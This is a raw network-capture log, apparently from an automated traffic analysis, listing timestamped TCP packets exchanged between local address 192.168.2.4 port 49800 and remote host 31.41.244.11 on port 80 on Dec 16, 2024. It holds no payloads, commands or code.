                                                                                                                                                                                              Dec 16, 2024 01:01:26.403377056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.403424025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.403465033 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.404234886 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.404354095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.404359102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.404401064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.405131102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.405193090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.405237913 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.405306101 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.406038046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.406091928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.406122923 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.406168938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.406919956 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.406972885 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.407021046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.407114983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.407812119 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.407861948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.407916069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.408155918 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.408730030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.408792019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.408890009 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.408934116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.409629107 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.409723997 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.409784079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.410495043 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.410562038 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.410607100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.410655975 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.411371946 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.411418915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.411492109 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.411551952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.412334919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.412393093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.412400961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.412444115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.413188934 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.413302898 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.413374901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.414076090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.414123058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492254972 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492281914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492309093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492341995 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492386103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492553949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492553949 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492594004 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492619038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.492752075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.493412971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.493457079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.493498087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.493566036 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.494215965 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.494385958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.562766075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.562804937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.562869072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.562948942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.562968969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.563018084 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.563875914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.563927889 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.563987970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564177990 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564488888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564538002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564774990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564821959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564867020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.564913034 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.565632105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.565680981 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.565722942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.565776110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.566510916 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.566566944 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.566596985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.566742897 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.567289114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.567359924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.567372084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.567414045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.568140030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.568192005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.568253994 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.568295956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.568991899 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569037914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569127083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569170952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569802999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569854021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569916010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.569962978 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.570652962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.570700884 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.570748091 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.570795059 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.571507931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.571563959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.571598053 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.571635008 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.572331905 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.572402954 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.572443008 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.572598934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.573232889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.573287010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.573322058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.573472023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574007034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574067116 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574105978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574152946 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574841976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574896097 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.574973106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.575072050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.575746059 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.575808048 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.575841904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.575884104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.576716900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.576777935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.576807976 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.576848030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.577369928 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.577430010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.577502012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.577615023 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.578207970 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.578260899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.578308105 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.578478098 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579040051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579113007 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579157114 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579201937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579880953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579937935 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.579993010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.580037117 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.580724955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.580776930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.580838919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.580914974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.581577063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.581626892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.581693888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.581738949 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.582406044 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.582448959 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.582535028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.582637072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.583266020 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.583333015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.583370924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.583411932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.584084034 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.584140062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.584172010 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.584213972 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.584943056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.584992886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.585164070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.585207939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.585771084 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.585819006 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.585872889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.585921049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.586621046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.586668015 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.586744070 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.586795092 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.587447882 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.587513924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.587552071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.587596893 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.588283062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.588330030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.588376999 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.588546991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.589140892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.589190006 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.589235067 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.589515924 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.589967012 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590022087 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590066910 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590110064 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590789080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590846062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590862989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.590902090 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.591639996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.591707945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.591747046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.591866016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.592477083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.592534065 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.592580080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.592740059 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.593341112 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.593395948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.593442917 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.593554020 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.594163895 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.594223976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.594270945 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.594319105 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595037937 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595083952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595115900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595165014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595869064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595982075 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.595983028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.596020937 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.596677065 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.596786022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.596832037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.597526073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.597579956 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.597636938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.597676992 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.598368883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.598423958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.598469019 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.598511934 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.599216938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.599268913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.599320889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.599366903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600066900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600117922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600171089 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600209951 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600887060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600934982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.600981951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.601072073 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.601711035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.601757050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.601809025 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.602019072 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.602574110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.602622986 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.602670908 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.602720976 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.603415966 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.603456974 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684305906 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684333086 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684374094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684396029 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684613943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684667110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684679031 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.684721947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.685439110 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.685518026 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.685585022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.685622931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.686232090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.686276913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.754798889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.754826069 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.754868031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.754911900 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755038977 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755059004 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755079985 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755106926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755714893 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755754948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.755942106 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756072044 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756561995 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756623983 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756812096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756850004 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756912947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.756951094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:26.757674932 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:26.757709980 CET4980080192.168.2.431.41.244.11
